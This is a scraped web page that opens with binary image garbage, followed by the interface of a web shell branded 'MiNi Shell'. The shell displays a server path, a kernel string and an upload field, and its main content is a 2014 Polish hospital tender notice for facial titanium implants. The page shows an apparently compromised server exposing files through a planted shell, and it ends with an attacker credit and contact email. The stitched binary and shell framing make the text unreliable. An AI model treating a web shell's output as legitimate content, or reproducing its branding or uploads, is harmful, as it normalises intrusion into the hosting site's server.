JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140207/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140207/25211-N-2014.html

<p class="kh_header"><b>Gdynia: Przedmiotem niniejszego zamówienia są sukcesywne dostawy implantów do osteosyntezy w obrębie twarzoczaszki dla Szpitala Św. Wincentego a Paulo Sp. z o.o. z siedzibą w Gdyni.</b><br>
<b>Numer ogłoszenia: 25211 - 2014; data zamieszczenia: 07.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Św. Wincentego a Paulo Spółka z o.o. , ul. Wójta Radtkego 1, 81-348 Gdynia, woj. pomorskie, tel. 58 6207501, faks 58 6201114.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpitalwincentego.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem niniejszego zamówienia są sukcesywne dostawy implantów do osteosyntezy w obrębie twarzoczaszki dla Szpitala Św. Wincentego a Paulo Sp. z o.o. z siedzibą w Gdyni..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia są sukcesywne dostawy implantów do osteosyntezy w obrębie twarzoczaszki dla Szpitala Św. Wincentego a Paulo Sp. z o.o. z siedzibą w Gdyni.
1.	Uniwersalna płyta tytanowa, adaptacyjna, prosta, 20 otworowa, profil  0,5, 0,7, 0,8 mm (do śródoperacyjnego wyboru operatora)	- 20 szt.
2.	Płytka tytanowa typu Y, 5 otworowa, profil 0,4, 0,5, 0,7 mm (do śródoperacyjnego wyboru operatora)	- 5 szt.
3.	Płytka tytanowa typu podwójny Y, 6 otworowa, profil 0,5,  mm (do śródoperacyjnego wyboru operatora)	- 3 szt.
4.	Płytka tytanowa typu L 3+3 otwory,  obustronna, z podziałką milimetrową, profil 0,5, 0,7, 0,8 mm; mała, średnia, duża (do śródoperacyjnego wyboru operatora)	-20 szt.
5.	Płytka tytanowa anatomiczna typu L 3+3 otwory,  obustronna, z podziałką milimetrową, profil 0,5, 0,7, 0,8 mm; mała, średnia, duża (do śródoperacyjnego wyboru operatora)	- 20 szt.
6.	Uniwersalna śruba tytanowa 1.5, do wszystkich rodzajów mikropłyt (0,4, 0,5, 0,7, 0,8 mm), samowiercąca, dł. 4, 5, 6  mm; TAN, pakowana jednostkowo w klipsie	-50 szt.
7.	Uniwersalna śruba tytanowa 1.5, do wszystkich rodzajów mikropłyt (0,4, 0,5, 0,7, 0,8 mm), samogwintująca, dł.  6, 8 mm; TAN	-60 szt.
8.	Śruba awaryjna 1.8, dl. 4, 5, 6, 8  mm	- 10 szt.
9.	Radialna siatka oczodołowa do rekonstrukcji dna i ścian bocznych, z możliwością fiksacji na dolnym brzegu oczodołu, profil 0,2 mm (do śródoperacyjnego wyboru operatora)	- 2 szt.
10.	Płytka oczodołowa, resorbowalna, do rekonstrukcji dna oczodołu (polimer kwasu mlekowego i glikolidu), pakowana sterylnie, jednostkowo, okres resorpcji ok. 1 roku	- 2 szt.
11.	Płytka oczodołowa, do rekonstrukcji dna oczodołu, polietylen, 24x24, 30 x 30 lub 35x35 mm, profil 0,8 mm, pakowana sterylnie, jednostkowo	- 2 szt.
12.	Płytka do osteotomii strzałkowej żuchwy, 2+2 lub 3+3 otwory (do śródoperacyjnego wyboru operatora), profil 1,0 mm	- 8 szt.
13.	Śruba tytanowa, ortognatyczna, samowiercąca, śr. 1,85 mm, dł.4, 5, 6, 8 mm, pakowana jednostkowo w klipsie.	- 80 szt.
14.	Śruba tytanowa, ortognatyczna, samogwintująca, śr. 1,85 mm, dł.4, 5, 6, 8, 10, 12, 14, 16, 18 mm, pakowana jednostkowo w klipsie.	-70 szt.
15.	Śruba tytanowa, ortognatyczna, samogwintująca, śr. 2,1 mm, dł.5, 6, 8, 10, 12, 14, 16, 18 mm, pakowana jednostkowo w klipsie.	- 10 szt.
16.	Płytka bródkowa, do genioplastyki, offset 4, 6, 8, 10 mm (do wyboru operatora, profil 0,7 mm	- 4 szt.
17.	Płyta rekonstrukcyjna, z nagwintowanymi otworami, prosta, 20 otworowa, profil 2,5 mm	-2 szt.
18.	Płyta rekonstrukcyjna, z nagwintowanymi otworami, prawostronnie lub lewostronnie (do śródoperacyjnego wyboru operatora) dogięta 7+23 otwory, profil 2,5 mm	- 4 szt.
19.	Śruba tytanowa, rekonstrukcyjna 2.4, z nagwintowanym łbem, blokująca się w płycie, z możliwością wprowadzenia pod kątem max. 10stopni, dł. 8, 10, 12 mm - 30 szt.
20.	Żuchwowa płyta adaptacyjna, profil 1,0 mm, 20 otworowa, z nagwintowanymi otworami, czysty tytan	- 5 szt.
21.	Żuchwowa płyta adaptacyjna, profil 1,25 mm, z nagwintowanymi otworami, 12 otworowa, czysty tytan	- 4 szt.
22.	Płytka żuchwowa 3+3(2+2) otwory, profil 1,0 mm, z cienką przestrzenią centralną	- 5 szt.
23.	Płytka żuchwowa do złamań kąta 3+3 otwory, profil 1,25 mm, z nagwintowanymi otworami, kompresyjna, ze wzmocnioną przestrzenią centralną	- 5 szt.
24.	Śruba tytanowa 2.0, dł. 5, 6, 8 mm (do wyboru operatora), pakowana jednostkowo w klipsie, TAN	- 70 szt.
25.	Śruba awaryjna 2.4, dł. 5, 6, 8, 10 mm (do wyboru operatora), pakowana jednostkowo w klipsie, TAN	- 20 szt.
26.	Śruba IMF, średnica 2.0 mm, SSt, dł. 8 mm, 12 mm	- 20 szt.
27.	Biologiczna pozakomórkowa matryca kolagenowa, pochodzenia zwierzęcego, do rekonstrukcji tkanek miękkich i błony śluzowej 20 x 40 mm, 	- 2 szt.
28.	Płytka adaptacyjna 1.5, 8 otworów, grubość 0,8 mm, okres resorbcji 1 rok, pakowana sterylnie, jednostkowo	- 2 szt.
29.	Śruba korowa średnica 1.5, resorbowalna, dł. 4 mm, okres resorbcji 1 rok, sterylna, pakowana po 2 szt. w dysku	- 1 szt.
30.	Śruba korowa średnica 1.5, resorbowalna, dł. 4 mm, okres resorbcji 1 rok, sterylna, pakowana po 4 szt. w dysku	- 1 szt.
31.	Śruba korowa średnica 1.5, resorbowalna, dł. 6 mm, okres resorbcji 1 rok, sterylna, pakowana po 4 szt. w dysku	- 1 szt.
32.	Śruba korowa średnica 1.5, resorbowalna, dł. 8 mm, okres resorbcji 1 rok, sterylna, pakowana po 4 szt. w dysku	- 1 szt.
33.	Śruba korowa średnica 2.0, resorbowalna, dł. 6 mm, okres resorbcji 1 rok, sterylna, pakowana po 2 szt. w dysku	- 1 szt.
34.	Śruba korowa średnica 2.0, resorbowalna, dł. 8 mm, okres resorbcji 1 rok, sterylna, pakowana po 2 szt. w dysku	- 1 szt..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.13.20.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga zabezpieczenia oferty wadium</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiany zawartej umowy będą wymagały pisemnego aneksu, w zakresie ustalonym w załączonym do SIWZ wzorze umowy. Istotne zmiany umowy w stosunku do treści oferty, na podstawie której wyłoniono wykonawcę, mogą dotyczyć:
1)	wynagrodzenia wykonawcy, 
2)	częstotliwości dostaw, miejsca dostaw,
3)	zmiany cen asortymentu wskazanego w umowie,
4)	rodzaju zamawianego asortymentu, pod warunkiem, że cena zmiana ta nie spowoduje zmiany ceny oferty na podstawie której wyłoniono Wykonawcę
5)	parametrów jakościowych oferowanego asortymentu, w przypadku zaoferowania przez wykonawcę parametrów o wyższym standardzie jakości, przy czym wartość umowy nie ulegnie zwiększeniu;
6)	zmiany nazwy produktu przy zachowaniu jego parametrów w sytuacji, gdy produkt zostanie wycofany z produkcji, lub wprowadzony do sprzedaży przez producenta produkt zmodyfikowany / udoskonalony, przy czym zmiana ta nie może powodować wzrostu ceny zawartej w ofercie,
7)	upadłości albo likwidacji producenta lub dystrybutora
8)	wydłużenia terminu obowiązywania umowy, w sytuacji nie zrealizowania całego asortymentu będącego przedmiotem umowy w pierwotnym terminie. 
2.	Zmiany, o których mowa w ust. 1 mogą być dokonane w następujących przypadkach:
1) ustawowej zmiany stawki podatku od towarów i usług (VAT),  przy czym zmianie ulegną wyłącznie ceny jednostkowe brutto, natomiast ceny jednostkowe netto pozostaną bez zmian;
2)	w zakresie, o którym mowa w ust. 1 pkt. 3, w przypadku:
a)	zmian wprowadzonych przez producentów, obniżki marży;
b)	zmian kursu waluty w przypadku towarów importowanych, zgodnie z tabelą NBP;
3)	w przypadku zmiany przepisów prawa mających wpływ na warunki umowy;
4)	jeżeli zmiany nie spowodują negatywnych konsekwencji dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitalwincentego.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Św. Wincentego a Paulo Sp. z o.o. z siedzibą w Gdyni, ul. Wójta Radtkego 1, 81 - 348 Gdynia, Dział Zamówień Publicznych,  bud. gospodarczy pok. nr 11..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.02.2014 godzina 10:00, miejsce: Szpital Św. Wincentego a Paulo Sp. z o.o. z siedzibą w Gdyni, ul. Wójta Radtkego 1, 81 - 348 Gdynia, Dział Zamówień Publicznych,  bud. gospodarczy pok. nr 11..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com